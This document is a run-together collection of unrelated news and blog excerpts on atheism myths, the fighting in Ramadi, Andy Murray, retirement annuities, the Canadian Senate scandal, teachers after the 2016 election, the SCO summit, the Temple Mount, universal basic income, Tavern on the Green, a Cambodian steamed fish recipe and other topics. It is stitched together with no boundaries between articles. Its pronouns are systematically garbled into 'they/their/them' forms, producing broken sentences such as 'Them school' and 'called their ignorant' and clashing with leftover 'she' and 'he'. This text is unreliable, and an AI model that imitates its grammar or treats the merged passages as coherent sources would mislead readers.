But just as Christians do not universally hate Allah and Jews do not universally hate Jesus, many atheists are perfectly happy to differ from organized religion without demonizing its top representatives. This isn't to say that some atheists haven't had bad experiences with religion in the past — and yes, some of those experiences may even have motivated their atheism. But that's not the same as harboring a lingering hatred of God, nor does it mean they want to destroy religion for everyone else.
Noting that they hate God about as much as they "hates unicorns," blogger Lee Myers clarifies, that "Not believing in a particular religion is not dependent on a negative opinion of that religion's deity or messiah figure. It's simply the result of not being convinced because the burden of proof has not been met."
Look at how jovial these two men — one an atheist and the other a Christian — appear while debating each other in 2013. Clearly, the issue does not need to be mired in anger or unpleasantness.
6. Atheists believe the universe is all a big coincidence.
Nobody — not religious scholars, atheists nor scientists — knows with certainty how the universe was created. But while some religious adherents choose to believe in their respective creation stories, most atheists err on the side of evolutionary theory, not random coincidence.
Indeed, atheism and science are closely linked. Although popular science luminary and Cosmos host Carl Sagan never explicitly called themselves an atheist or a humanist, the movement wholeheartedly embraced him, and they them.
"His idea of the immensity of the universe and how small we are just impressed me so much as a teenager," Amanda Knief, managing director for American Atheists, told the St. Louis Tribune. "It really led me to look beyond the religion I was raised in and shaped my Humanism."
Sagan also rather enthusiastically accepted the American Humanist Association's Humanist of the Year Award in 1981.
7. Atheists want to ban Christmas.
Although we've already touched a bit on this myth, it's worth revisiting if only because it's so emblematic of the current American atheist stereotype. In 2013, Bill O'Reilly bemoaned the fact that while Christians were seemingly under attack from all sides, "[atheists] are free to celebrate whatever they want to celebrate. They are free not to believe and they are free to snicker at anybody who does believe. That's not good enough for these people. They want to banish any mention of Jesus in the public square. They are the oppressors."
Indeed. The controversy has yet to fade in part because of organizations like the American Atheists, which has stirred up their fair share of headlines with billboards letting citizens know "they don't need religion to have a great Christmas," according to American Atheists President David Silverman. Of course, the takeaway here should be that Silverman and their organization are neither trying to ban Christmas nor declare war on it. They are simply choosing to celebrate it in a secular fashion. That means the tree, the ornaments and Santa, but maybe not Sunday Mass. While O'Reilly may not like it, Pew research shows that millennials are already attending church less than their elders, so this type of Christmas tradition is fading regardless of a few billboards.
Meanwhile, the increasing politicizing of religion, coupled with growing conflict between anti-gay religious conservatives and their more liberal children, is leading to lower religious engagement across the board. Perhaps O'Reilly should focus on these fundamental dichotomies before pointing the finger at atheists.
Image copyright AFP Image caption Buildings in Ramadi have been heavily damaged by the fighting
Fighters from so-called Islamic State (IS) have continued to pursue counterattacks on the edges of Ramadi a week after the city was recaptured by Iraqi troops.
Most of the attacks were outside central Ramadi to the north and east, spokesperson for the US-led coalition, Col Steve Warren, told the AFP news agency.
They said Iraqi government forces had so far successfully repelled every attack.
On Friday the group attacked a military base near the city.
The Iraqi government said a week ago that it had "liberated" Ramadi from IS. The jihadist group had held the city since May.
Col Warren said they had not yet seen IS "mass enough combat power to move Iraq off their positions".
Is Ramadi the model for defeating IS in Iraq?
Did tactical switch help advance?
Islamic State conflict
Life under IS
Viewpoint: How to defeat IS
The BBC's Thomas Fessy, who has just returned from Ramadi, says a tough fight continues in the city and government forces have been taking casualties.
"The national flag is back in most of the city, but on the frontline we saw the black IS banner flying - defiant - less than a hundred metres away from the Iraqis'", they added.
Media playback is unsupported on your device Media caption Thomas Fessy looks at how the battle for the Iraqi city of Ramadi unfolded
A military spokesperson said Friday's attack on a military base was carried out by suicide car bombers and fighters wearing explosive belts.
The army fought back with the help of air strikes by the US-led coalition.
The attack is the biggest launched by IS against Iraqi forces since Ramadi's recapture.
BBC World Service Middle East analyst Sebastian Usher says the assault shows the scale of the task confronting Iraqi government forces - as troops are faced with an unknown number of IS fighters still holding out on the outskirts.
Over the weekend Iraqi troops and allied Sunni tribal fighters helped civilians to safer places in Ramadi.
Their homes were crushed in the fighting and many had been hiding in the rubble for days, our correspondent says.
ANDY MURRAY would be the first to admit they are not much of a party animal so it was no surprise last night to hear the Scot reveal that they have spent much of the week after helping Britain to Davis Cup glory lying on the sofa.
Murray's heroics in Belgium ensured the Davis Cup came home to Britain for the first time in 79 years, their 11 wins out of 11, in singles and doubles, achieving a feat even they must have felt was a remote possibility for much of their career.
Their two singles wins and their doubles triumph with brother Jamie took Britain to a 3-1 win in Belgium last weekend and though there were plenty of media commitments, Murray said it had been a draining, if fantastic, experience.
“It's been a nice week,” they said last night at London's Royal Albert Hall where they were taking part in Tie Break Tens, a new quickfire format involving a series of first-to-10 tiebreaks.
“We didn't get back until Monday afternoon and then Monday night we all went out for dinner. It does take a lot out of you, Davis Cup weeks, because we went out for dinner and for the first hour and a half everyone was on great form but we started getting tired pretty quickly.
“On Tuesday, we had some commitments – we went to Downing Street and stuff – and then I slept most of Tuesday and Wednesday during the day. I was just really tired, on the sofa sleeping, not doing a whole lot. That's really it, I haven't done much more than that.”
Murray played 85 singles matches in 2015, the most of their career, and they will be back on court in a couple of weeks when they play two matches at the Indian Premier Tennis League in Dubai, having replaced Novak Djokovic in the line-up.
With their wife, Kim, due to have their first child in February, Murray knows they have one more big push at the Australian Open next month before they can have some sort of rest, baby aside.
And last night former world No.1 John McEnroe, who is also playing in the short-format event, said the Scot's Davis Cup exploits could help them win in Melbourne, where has lost in four finals, three of them to Djokovic.
“He has had an extremely long year so they are going to need a break,” McEnroe said.
“[But] he's been in four Australian Open finals so they could potentially use it to their advantage, it is something that could help them get over the hump because they could be a bit sharper than normal, and he's already had great results there.
“Obviously Novak, though, is going to say ‘ha, ha I got a little rest' so it's mentally how you deal with it when it comes down to that moment if they were to play again.”
Murray is due to leave on Thursday for a short training programme in Dubai, where they are also set to be reunited with their coach, Amelie Mauresmo.
Good morning, readers! I bring great news. After a long search it is a pleasure to introduce Kotaku UK's new News Editor, Laura Kate Dale, who joins us after several years as a freelancer and running their own site, Let's Play Video Games. It says everything about Laura's track record that last year, while having a beer with an old colleague and discussing scoopsters, they put their glass down and said "who is Laura Kate Dale?" This is Laura Kate Dale.
Laura has a great instinct for newsgathering, follows up on reports like Beelzebub's own bloodhounds, and brings a wide-ranging interest in the games scene to Kotaku UK. Myself and Keza MacDonald are delighted and excited to have them on board, and can't wait to work with them Here's what Laura has to say:
Well, isn't this exciting? I've been excitedly sat on this news for a little while now, but today is my first day as News Editor at Kotaku UK. Three years from minimum wage supermarket store assistant to Editor at a major gaming site has been a pretty wild ride. So, who am I? I've spent the last years as a freelance games critic, written for pretty much every gaming publication under the sun, and have a passion for digging down to the stories PR teams are not eager to talk about. I love weird little indie games about sex imps living in Anne Hathaway's mouth, big sprawling JRPGs, and serious in depth discussions of the artistic value of video game character buttock designs. I'm always looking for interesting stories about games, the people making them, and the stories that happened along the way to store shelves. If you've got a hot scoop, drop me an email or hit me up on Twitter.
I'd like to especially thank the multitalented Matt Wales, who over the past months has helped keep the site running and done great work with humour and grace — he's around for a few days tidying-up loose ends, so do pop into their articles and mention what a fine individual they are.
WOOOOO-OOOOO that's the happy klaxon, as Kotaku UK returns to full force. And you haven't even seen our Super Saiyan form yet. Thanks for reading as always, do say hello to Laura in the comments, and be nice!
Retirement researcher Wade Pfau recently released a paper titled “An Efficient Frontier for Retirement Income” (summary here) in which they compared different allocations of stocks, bonds, fixed lifetime annuities, inflation-adjusted lifetime annuities, and variable annuities with “guaranteed lifetime withdrawal benefit” riders to see how each combination plays out in terms of meeting two competing retirement goals:
Minimizing the shortfall between desired spending and actual spending, and Maximizing the amount of money you leave to your heirs.
The results were rather shocking. So shocking, in fact, that there's a good chance you'll read about it elsewhere (which is why I'm hoping to prepare you for what you'll hear).
What Wade found was that, given the assumptions they used, the ideal allocations for retirees involved only stocks and fixed lifetime annuities. That is, the ideal allocations included no bonds, no inflation-adjusted lifetime annuities, and no variable annuities (although I don't think many people will find that last part to be particularly shocking).
What's important to understand, however, is that Wade's paper is not about showing you how to allocate your money — at least not directly. Rather, it's about creating a new method for analyzing various allocations — by looking at how well each allocation meets those two goals above, rather than looking at, say, the allocation's probability of running out of money within 30 years.
The specific results that Wade provides in their paper are only an example of one such analysis. And they use a very specific (though mostly reasonable) set of assumptions (about stock and bond returns, correlations between them, rates of inflation, and so on). When those assumptions are changed, the results might look very different.
In other words, for individual investors, the takeaway is not that you should dump all your bonds in favor of stocks and/or fixed lifetime annuities. Rather, the takeaway is simply that a portfolio completely eschewing bonds in favor of lifetime annuities might not be completely-off-the-wall-crazy. And, given how far such a portfolio would be from conventional retirement recommendations, that's very interesting.
I hope we'll see more research along these lines in the near future.
From the ceremonies of the declaration of federalism in Rojava, Rumelan, northeastern Syria. File photo: ARA New
Click to email this to a friend (Opens in new window)
Click to share on Telegram (Opens in new window)
Click to share on WhatsApp (Opens in new window)
Click to print (Opens in new window)
Click to share on Google+ (Opens in new window)
Click to share on Reddit (Opens in new window)
Click to share on Twitter (Opens in new window)
Click to share on Facebook (Opens in new window)
Syrian Kurdish party calls on Rojava Administration to release all political prisoners
Senior Kurdish official says independence referendum cannot be postponed
At least 15 Kurdish YPG fighters killed by ISIS fire in Raqqa: official
Syrian Kurds denounce Turkish propaganda, say US weapons only to be used in fight against ISIS
ARA News
The Executive Board of the Constituent Council of the Democratic Federal System in Rojava-Northern Syria met with members of the Council and representatives of the Electoral Commission on Thursday to discuss the election law and the administrative divisions of the regions of Rojava and Northern Syria.
A broad meeting was held at the headquarters of the Constituent Council of the Democratic Federal System of Northern Syria to discuss the draft electoral law and administrative divisions in the regions of Rojava and northern Syria.
According to the local Kurdish news agency ANHA, the meeting was attended by the Co-Chairs of the Executive Council of the Democratic Federalist System of Northern Syria Fawza Yousef and Sanharib Barsoum and the Co-Chairmen of the Constituent council of the Democratic Federalist System of Northern Syria Hediya Youssef and Mansour Salloum, as well as members of the executive board of the three provinces of Kobani, Jazirah and Afrin and representatives of the Shahba region (Northern Aleppo).
The participants reportedly discussed the items of the draft election law, and proposed amendments to its provisions.
Sources within the meeting confirmed to ARA News that the participants also discussed the administrative divisions of the regions of Rojava and northern Syria. The sources suggested that the draft law on elections and administrative divisions of the Council of the Democratic Federal System of Northern Syria will be submitted for approval at a later meeting.
Reporting by: Wladimir van Wilgenburg | Source: ARA News
For the latest news follow us on Twitter
Join our Weekly Newsletter
OTTAWA (Reuters) - Canadian police laid fraud charges against a senator and a former senator on Tuesday following an expenses scandal that has rocked the country's unelected Senate and tainted the Conservative government of Prime Minister Stephen Harper.
Royal Canadian Mounted Police (RCMP) Assistant Commissioner Gilles Michaud delivers a statement in Ottawa February 4, 2014. REUTERS/Chris Wattie
The fraud and breach-of-trust charges were laid by the Royal Canadian Mounted Police against Mac Harb, a Liberal appointee who resigned from the Senate in August, and Patrick Brazeau, who was expelled from the Conservative caucus last year and then suspended from the Senate because of what were deemed to be inappropriate expense claims.
The charges have not been proven in court.
“These investigations were detailed and involved the careful consideration and examination of evidence,” Gilles Michaud, commanding officer of the Mounties' national division, said in a nationally televised statement.
“Our investigators interviewed dozens of individuals and witnesses. As is typical with any investigation, we also reviewed and analyzed thousands of documents, including financial statements, bank records and expense claims which dated back to 2003,” they said.
The controversy stems from housing and living expenses the two men claimed. Harb and Brazeau have both said that they followed Senate rules in claiming expenses and that the rules were changed and unfairly applied retroactively.
Harb's lawyer Sean May said their client looked forward to being in court to be able to answer the charges, which they deny.
“He is prepared to respond and to respond vigorously to the accusations,” May said.
The first court appearance is likely in the next few weeks, but the trial is not likely for a year, they added.
Brazeau did not provide an immediate reaction.
Along with Brazeau, two other Conservative appointees involved in controversy over their expense claims have been suspended from the Senate. These two have also said they are innocent of wrongdoing.
Michaud said work was continuing on “other significant files.”
Police said in November they were investigating Harper's former chief of staff, Nigel Wright, on suspicion that they acted corruptly in giving their own money to one of the suspended senators, Mike Duffy, to help Duffy pay back expenses the Senate said they should not have claimed.
Wright has said they acted within the scope of their duties and has voiced confidence their actions were lawful.
With the scandal reaching into Harper's office, the Conservatives have been hurt in the polls. The party came to power in 2006 pledging clean and accountable government.
The scandal has also damaged the reputation of the Senate, the upper house of Canada's parliament, whose members are appointed rather than elected, spurring calls from across the political spectrum for the chamber to be reformed or abolished.
Julie Rine has been teaching for 20 years, and since that time, they have endured a number of personal and national tragedies. She's dealt with the death of their husband. They witnessed 9/11.
And yet, Wednesday was the hardest day of teaching she's ever experienced. It was the day after Hillary Clinton lost the presidency to Donald Trump.
For months, Rine has watched as high school students in their small, conservative, Ohio town mimicked the Republican's negative rhetoric. Rine, who teaches English, overheard students talking between classes about “building a wall,” even in front of their friends of Mexican descent.
The students don't do it to specifically bully others, Rine says ― they're just parroting what they see in the media. But it worries them
“I don't think they realize that's hurtful to other kids,” they said.
Like much of the nation, Rine, a Democrat, thought Clinton would win the election, allowing them and their fellow teachers to move on. But they were wrong, and Trump prevailed. They fear for their students' futures.
“If we are already fighting the hurtful effect of comments when kids repeat what Trump has said in the campaign, I can't even fathom what we will be fighting after four years of their hateful rhetoric,” said Rine.
In April, the Southern Poverty Law Center released a report on the “Trump effect,” describing how the business person's racially-charged rhetoric coincided with an uptick in school bullying. In the report ― based on anecdotes from teachers, not empirical data ― teachers described the schoolyard harassment their students of color and Muslim students were increasingly subjected to.
Now that Trump has successfully attained the nation's highest office, educators are grappling with the fact that a Trump presidency could further embolden school bullies.
Katelyn, a social studies teacher in Connecticut who didn't want to use their full name for fear of retribution, has seen the Trump effect's impact on both students and parents. Them school doesn't allow teachers to talk about the election directly, but even talking about elements of the democratic process ― like the electoral map ― has become fraught with tension this year.
“From some kids, there was genuine concern. I have Hispanic students. They're not immune to the election and what went on for the last 15 months,” Katelyn said. “If someone has a question, they feel like they can't even ask. I can see that. They feel like they're going to get shut down by someone shouting ‘Hillary for handcuffs.' There was talk of assassination attempts from students supporting both Clinton and Trump.”
Earlier this year, Katelyn drew parents' ire when they sent home a current events article about professional athletes protesting the national anthem. The reading wasn't meant to take a specific stance, but to give an overview of the situation and connect the protests to previous movements ― because “any time students can see present connecting to the past, it makes it more meaningful for them,” Katelyn explained.
They soon learned that local parents didn't appreciate the effort. They started circulating their name and bad-mouthing them publicly on Facebook.
“I did feel threatened by parents,” they said, connecting the incident to heightened political polarization nationwide. The parents accused Katelyn of promoting the Black Lives Matter movement, even though they say they had no such agenda. “It wasn't meant to be one sided at all, and it kind of got spun.”
This year, [I] spent a lot more time talking about some of the rhetoric and the idea that we need to be able to treat each other with respect regardless of differences. Josh Brown, middle school civics teacher
In the Iowa middle school where Josh Brown works as a civics teacher, counselors have been working with some students to help them deal with mental health issues that have arisen during the campaign.
Brown says their students have been especially engaged in current events this year, but the classroom is not necessarily better for it. During the school's mock election, they found one student crying in the hallway. Someone had called their “ignorant” for voting for Clinton.
Earlier in the year, one of Brown's students of Mexican descent was targeted for their heritage. “A student went after her, telling her, ‘We need to build that wall and get rid of you.' Having that conversation, it was not something I was expecting to have to do this year,” said Brown, who has taught civics for over a decade.
“We've taught the election before and had great conversations around the issues,” they added. “This year, [I] spent a lot more time talking about some of the rhetoric and the idea that we need to be able to treat each other with respect regardless of differences.”
On Tuesday, Brown said they were nervous that a Trump win would validate some of the bullies' behaviors. On Wednesday, though, things went better than expected. Students on either end of the political spectrum were largely respectful of each other, they said.
Programming (Windows):
Programming (Mac):
Coda - this is what I use
Espresso
Dreamweaver
Aptana
Eclipse
TextMate
MonoDevelop
Design (Windows/Mac):
Photoshop - this is what I use
GIMP
Today the European Court of Human Rights will begin chamber hearings in the the cases of Chaplin v. the United Kingdom, Eweida v. the United Kingdom, Ladele v. the United Kingdom and McFarlane v. the United Kingdom. The applicants, four practicing Christians', complain that domestic law failed to adequately protect their right to manifest their religion. The British Humanist Association (BHA) has stated that domestic courts were right to uphold human rights and equalities law and principles in dismissing cases of alleged Christian discrimination.
The cases involve Lillian Ladele, the registrar who refused to fulfil their duties because of their ‘orthodox Christian beliefs' against same-sex partnerships and Gary McFarlane, who refused to treat gay couples equally with straight ones in their job as a counsellor at Relate; and the cases of Nadia Eweida, who has repeatedly lost their claims of religious discrimination against their employer British Airways, and of Shirley Chaplin, who claimed that uniform codes violated their human rights as a Christian.
BHA Chief Executive Andrew Copson commented, ‘Our domestic courts have been robust in dismissing these cases and the victim narrative that lies behind them has no basis in reality. What they describe as discrimination and marginalisation of Christians is in fact the proper upholding of human rights and equalities law and principles. All reasonable people will agree that there is scope in a secular democracy for reasonable accommodation of religious beliefs when that accommodation does not affect the rights and freedoms of others. But if believers try to invoke their beliefs as a defence for treating other people badly – denying them a service because they are gay or claiming a right to preach at them in a professional context – the law is right to prevent them.'
Notes
For further comment or information contact BHA Chief Executive Andrew Copson on 07534 258596 or at andrew@humanism.org.uk.
The British Humanist Association is the national charity working on behalf of non-religious people who seek to live ethical and fulfilling lives on the basis of reason and humanity. It promotes a secular state and equal treatment in law and policy of everyone, regardless of religion or belief.
Sanctions against Iran are ‘unacceptable', stated the SCO summit participants. Iranian President Hassan Rouhani said they want a ‘swift resolution' to the issue of Tehran's nuclear program, but will not sacrifice its rights for the sake of a solution.
"Regarding the Iranian nuclear issue, we want the swiftest solution to it within international norms," said Rouhani on Friday at a meeting with Russian President Vladimir Putin on the sidelines of the Shanghai Cooperation Organization (SCO) summit in Kyrgyzstan's capital Bishkek.
Iran and the P5+1 group - Russia, China, UK, France, the US and Germany - have held several rounds of talks on a range of issues, with the main focus being on Iran's nuclear energy program. Some Western countries , mainly United States and Israel presume that the program is aimed at developing nuclear weapons and suggest imposing new sanctions on the Islamic Republic in addition to the existing restrictions on the economy, targeting investments in oil, gas and petrochemicals, exports of refined petroleum products, and others.
The SCO is an intergovernmental security organization that was founded in 2001 in Shanghai by China, Kazakhstan, Kyrgyzstan, Russia, Tajikistan, and Uzbekistan. Iran, Afghanistan, India, Mongolia, and Pakistan, have observer status. The SCO is primarily focused on its member nations' Central Asian security-related concerns, describing the main threats it confronts as terrorism, separatism and extremism.Tajikistan will replace Kyrgyzstan as chair of the SCO during the next summit in 2014.
Particularly, Israel's Ambassador to the International Atomic Energy Agency (IAEA) Ehud Azoulay said on Thursday that the change in Iran's presidency does not mean a "change in their (nuclear) policy," stressing that Tehran continues to seek nuclear arms under its newly-elected President Rouhani.
However, Iran says its nuclear program is aimed at developing energy and medicine, as the country has the right to use nuclear technology for peaceful purposes.
Under the Bishkek declaration signed by the SCO on Friday, the summit member states supported Iran by saying that “the threat of military force and unilateral sanctions against the independent state of [Iran] are unacceptable.”
Putin backed Iran's nuclear energy program in an address to the SCO saying “that Iran, the same as any other state, has the right to peaceful use of atomic energy, including enrichment operations.”
Putin said at the meeting with Rouhani on the sidelines of the summit that Iran was a ‘good neighbor' adding that Russia hopes for further cooperation with Tehran.
The parties stayed away from discussing the issue of constructing a new building at Iran's Bushehr nuclear reactor site, said Russian presidential spokesperson Dmitry Peskov. The construction of Bushehr - the first civilian nuclear plant in the Middle East - was started in 1975 by German companies, however a contract for finishing the plant was signed between Iran and the Russian Ministry for Atomic Energy in 1995. Bushehr nuclear power plant launched in 2011 has no link to nuclear weapons production and cannot be used to develop such technology.
Rouhani invited their Russian counterpart to Tehran, Peskov said on Friday adding that Putin accepted the invitation, the terms of the visit will be agreed through diplomatic channels.
SCO against Western intervention in Syria
The Syrian crisis almost hijacked the SCO summit, as the member states spoke out “against Western intervention in Syria, as well as the loosening of internal and regional stability in the Middle East,” according to the declaration.
The Russian President welcomed Syria's decision to join the global anti-chemical weapons treaty, saying it showed Damascus was serious in its intention to resolve the conflict.
"I believe we should welcome such a decision," Putin said in their address to the summit. "(It) is an important step towards the resolution of the Syrian crisis, this confirms the serious intention of our Syrian partners to follow this path."
"We believe military interference from outside in the country without a UN Security Council sanction is inadmissible," they stressed. "Promoting the initiative to establish international control over chemical weapons in Syria is of great importance".
Iran supported the Russian initiative to put Syria's chemical weapons arsenal under international control.
"The initiative of the Russian Federation with regard to Syria, as well as steps taken by the Syrian government have given us hope that we will be able to avoid a new war in the region" said Rouhani.
The Iranian President also called for the destruction of all chemical weapons.
“Iran, as the biggest victim of chemical weapons, opposes any production, storage and use of such weapons and calls for the destruction of weapons of mass destruction in the region”.
Rouhani expressed hope that the regional governments could decide the fate of their own countries, adding that “the presence of foreign forces in Afghanistan and other countries sets the stage for extremism in the region.” Under the Bishkek declaration, the SCO countries “emphasized that national reconciliation must be Afghan-led in order to facilitate the early realization of peace and stability in the country".
In addition, the member states reaffirmed their position on the US missile defense system, which, according to them, can cause damage to international security.
"The SCO member states are convinced that you cannot provide for your own security at the expense of others," the joint declaration stated.
Among other issues discussed at the summit, the participants raised the question of security urging against the use of information technology aimed at undermining political and economic security. The countries also emphasized the importance of establishing the SCO Development Fund and the SCO Bank. There was also a call to resume six-party-talks concerning North Korea's nuclear program.
JERUSALEM – For the first time in decades, Jews ascended the Temple Mount on Monday and prayed without fear of being arrested by Muslim religious authority officials who have kept away from the site in protest over the metal detectors installed after Friday's terror attack.
Police granted Jewish and other non-Muslim visitors permission to visit the holy site three days after Arab-Israeli gunmen attacked a group of police officers, killing two.
Officials from the Jordanian Islamic Waqf that administers the site and the Al-Aqsa mosque within have refused to ascend the Mount and urged other Muslims to stay away to protest the metal detectors that Israel installed at the entrance since the site's reopening on Sunday.
Jews took advantage of the lack of Waqf officials and recited the mourner's Kaddish for the murdered Druze police officers at the site.
Jews are banned from praying at the Temple Mount – Judaism's holiest site – in accordance with the status quo that was established following Israel's capture of the site in 1967. In April, Jewish visitors were arrested by Muslim officials for openly praying at the flashpoint site.
Arnon Segal, a reporter for Makor Rishon newspaper and an activist for Jewish rights to the Temple Mount, wrote on their Facebook page, “We're back, thank God. With more Jews on the Mountain, freedom of worship and service to God, tomorrow our smile will be even more beautiful.”
Despite Israeli assurances that the status quo will remain intact, the Waqf sees the installation of metal detectors and security cameras as an affront. The added security measures, which also work to protect Muslim worshippers, came in direct response to Friday's deadly terrorist attack in which three Israeli Arab assailants managed to get weapons onto the Mount.
On Sunday, protests erupted outside the site with the Waqf calling on Muslims in the city “to reject and boycott all the Israeli aggression measures, including changing the historical status quo including imposing the metal detectors.”
Education Minister Naftali Bennett said the Muslim reaction to the security measures was “a tempest in a teacup.”
They pointed out to Israel Radio on Monday that all Jewish visitors to the Western Wall and Muslim visitors to the Kaaba in Mecca were made to pass through metal detectors.
Public Security Minister Gilad Erdan told Channel 2 that the bolstered security measures at the site were now an imperative. “Live fire from inside the Temple Mount crosses every red line,” they said.
Farhad Manjoo: One key factor in the push for U.B.I., I think, is the idea that it could help reorder social expectations. At the moment we are all defined by work; Western society generally, but especially American society, keeps social score according to what people do and how much they make for it. The dreamiest proponents of U.B.I. see that changing as work goes away. It will be O.K., under this policy, to choose a life of learning instead of a low-paying bad job.
Eduardo Porter: To my mind, a universal basic income functions properly only in a world with little or no paid work because the odds of anybody taking a job when their or their needs are already being met are going to be fairly low. The discussion, I guess, really depends on how high this universal basic income would be. How many of our needs would it satisfy? We already sort of have a universal basic income guarantee. It's called food stamps, or SNAP. But it's impossible for people to live on food stamps alone.
This brings to mind something else. You give the techies credit for seriously proposing this as an optimal solution to wrenching technological and economic change. But in a way, isn't it a cop-out? They're just passing the bag to the political system. Telling Congress, “You fix it.”
If the idea of robots taking over sounds like science fiction, the idea of the American government agreeing to tax capitalists enough to hand out checks to support the entire working class is in an entirely new category of fantasy.
Farhad Manjoo: Yes, this is perhaps the biggest criticism of U.B.I.: It all sounds too fantastical! It's straight from sci-fi. And you're right; many of these proponents aren't shy about being inspired by fantasies of the future.
But paradoxically, they also see U.B.I. as more politically feasible than some of the other policy proposals you call for. One of the reasons some libertarians and conservatives like U.B.I. is that it is a very simple, efficient and universal form of welfare — everyone gets a monthly check, even the rich, and the government isn't going to tell you what to spend it on. Its very universality breaks through political opposition. And I should note that it's not only techies who are for it — Andy Stern, the former head of the S.E.I.U., will soon publish a book calling for a basic income.
Still, like you, I'm skeptical that we'll see anything close to this sort of proposal anytime soon. Even Bernie Sanders isn't proposing it. The techies, as usual, are either way ahead of everyone, or they're living in some other universe. Often it's hard to tell which is which.
The one and only, if NYC's lawyers have anything to say about it.
It's been a rough run for Tavern on the Green since it reopened in 2014. Two chefs have quit, and critics have been ruthless, saying the food “tasted vaguely of cleaning chemicals” and “recalled the worst of old Tavern,” which was put out of its misery in 2009. To preserve whatever dignity the world-famous restaurant has left, the city has lawyered up and told the company, which it licensed in 2011 to sell Tavern-branded goods, that now it can't franchise the restaurant. The city actually owns the Tavern name, and according to The Wall Street Journal, it “filed a complaint” in federal court on Friday to stop Tavern on the Green International, as the New Jersey-based LLC is known, from smearing the “celebrated name” any further.
The city's original agreement gave Tavern on the Green International permission to sell branded olive oils, coffee mugs with the logo, and even franchises, provided it clarified that this stuff had no affiliation with the real restaurant. (There was even a prohibition on using pictures of Central Park.) Last April, the city revoked that consent because, it argued, Tavern on the Green International had failed to make that distinction clear. It started holding franchising discussions four months later, regardless, and now a consulting firm called MBB Management — the company that brought you Chap Pit Beef and G.Love's Special Sauce — is promoting Tavern franchises online.
The way they're described on the website makes those opportunities sound pretty exciting, nostalgic, even downright Central Park-y:
MBB is proud to announce that Tavern on the Green International is taking that special, unique, pampered and iconic experience ‘on the road' to people outside the tri-state area. The Company is establishing a boutique network of restaurants to evoke a feeling of escape for the consumer. Restaurants will bring to mind memories of original visits to the space in New York City but they will be updated to offer the warm service, aesthetic and contemporary atmosphere that people have come to expect of restaurants as the new ‘accessible' private club.
The very mention of the “Tavern on the Green” brings a smile to the face of any past guest as memories of magical moments cross their mind. Many famous celebrities such as Dan Aykroyd, Halle Berry, Liv Tyler, Elijah Wood and countless others have visited the original location in New York City's Central Park.
At the bottom, it closes with this head-scratcher: “The Franchisee will also benefit from the global appeal and recognition of that world famous restaurant located in Central Park in the City of New York. The Tavern on the Green Franchise however, is not affiliated with Tavern on the Green in Central Park in New York City.”
The company's attorney tells the Journal that the city's lawsuit doesn't “have much validity,” and it appears their plan is to just keep plugging along. Tavern on the Green Vegas and Atlantic City could already be on their way.
By Dosaikal
In the Kingdom of Cambodia, Fish is a staple, and it can unambiguously be said that “Fish enjoys almost the royal status of Rice.”
The staple diet of Khmer is fresh water fish. With the abundant supply of fish (said to be 600 different species in the Tonle Sap lake), it is not surprising that the Khmer love to eat fish! If you are in Cambodia during November to February, there is a week per month where you may be able to see lots of fishing activity along the riverfront in Phnom Penh. Here the Mekhong and Sap rivers come together and the fish is very plentiful during this season. The Khmer make use of this season and not only eat the fish fresh but dry, smoke, ferment and make it into fish sauce so they can use it during lean times as their main source of proteinhttp://www.cambodiauncovered.com/cambodia/fishing.html
A glance of the varieties of fish available at the market –
medium and small
and bigger variety
the favorite among Cambodians – fish head
shrimps and seafood too
Trey Chamhoi – Cambodian Steamed Fish Recipe
Trey is Fish in Khmer. This one is the version of my Khmer friend who also cooks good Indian food. So, please let me know of the changes you make in your Cambodian steamed fish!
Yet, I promise I did not make any Indianised Cambodian Fish..
Cambodia's preferred source of protein is freshwater fish, caught mainly from the Tonle Sap and from the Tonle Sab, the Mekong, and the Basak rivers. Cambodians eat it fresh, salted, smoked, or made into fish sauce and paste. http://countrystudies.us/cambodia/65.htm
This one has the flavor of raw mangoes and is steamed in banana leaf.
Facts about how I used the Fish
I used two fishes 1.75 kgs put together.
I did not use the head of the fish.
Each fish was cut into two halves.
So, I g0t 4 medium size pieces.
How many fishes to be used, depends on how many pieces each member would need.
I. Needed most – Any kind of Steamer
II. Ingredients (serves two to four)
fish (any variety) – 2 no.s cut into 4 pieces
shallots – 4 no.s finely sliced
green chillies – 3 no.s
fresh red chillies – 3 no.s
spring onions – 2 or 3 bunches cut to the length of other juliennes
garlic – 6 cloves
ginger – 1 inch piece
carrot – 1 medium
raw mango – 1/2
radish – 1 small
salt – to taste
pepper powder – 1/2 tsp or as preferred
All vegetables finely julienned.
Instead of the above vegetables – can also use
1. capsicum in various colors – red, yellow and green
2. no vegetables and only mint and coriander leaves with ginger juliennes
3. any preferred vegetable of one's choice but I'd avoid those which let out water like cucumber or guards.
III. To wrap up in the steamer
aluminum foil to wrap up the steaming vessel first, so that the soup/broth that cooks with the fish doesn't fall in the water below
fresh banana leaf to cover the steaming vessel
steamer vessel with holes
Method of Preparation
1. Steamer
Make the steamer ready by wrapping first with aluminum foil Then place the banana leaves to cover the base
aluminum foil
banana leaf
2. Fish
Cut and wash fish into two halves each Rub salt and pepper powder on the fishes
3. Vegetables
Cut, slice and julienne the vegetables and mix together
4. To steam
1. Spread half of the vegetables on the banana leaf randomly
2. Place the fish pieces on the vegetable layer
3. Cover the fish with the remaining vegetables
4. Close the veggie-fish combination with a layer of banana leaves and place the vessel inside the steamer
5. Close the lid of the steamer
6. Steam for 15-20 minutes
7. Serve with the vegetables and soup/broth that lies beneath
8. Serve with hot rice.
Ready!
I am ‘Dosaikal' a food blogger (http://dosaikal.com/) who believes in strong traditional values and transfer of traditions to the next generation. I am always fascinated by different kinds of food from different parts of the world. I am especially impressed with the strong connection that south of india has with cambodia, in terms of food and temple architecture.
Gov. Andrew Cuomo is holding a meeting to prepare for a final push on the bill this week. | AP Photo N.Y. at the altar of gay marriage
In a development with national implications, New York is looking more and more like it will become the next state to legalize gay marriage as a bill gains momentum in the legislature ahead of a landmark vote that could come by midweek.
“I believe that votes will be there for marriage equality if the vote happens,” Democratic Gov. Andrew Cuomo said Monday afternoon. “I've had enough conversations with enough Republicans” to think the bill can succeed.
Story Continued Below
Cuomo, who strongly backs gay marriage, is meeting Monday afternoon with elected officials, gay rights advocates and labor groups to prepare for a final push on the bill this week to address the questions of whether Republicans in the state Senate will allow a vote and whether there is enough GOP support to pass the bill. The legislative session ends next Monday.
At the start of the day Monday, the bill's supporters still needed six more votes but, by early afternoon, the three undecided Democrats indicated that they're supporting the bill, The New York Times reported. All but one Democrat backs the measure but supporters still must find three more votes. At least seven of the 32 Republicans in the state Senate may vote for the bill - which would put it over the top, the New York Post reported Monday.
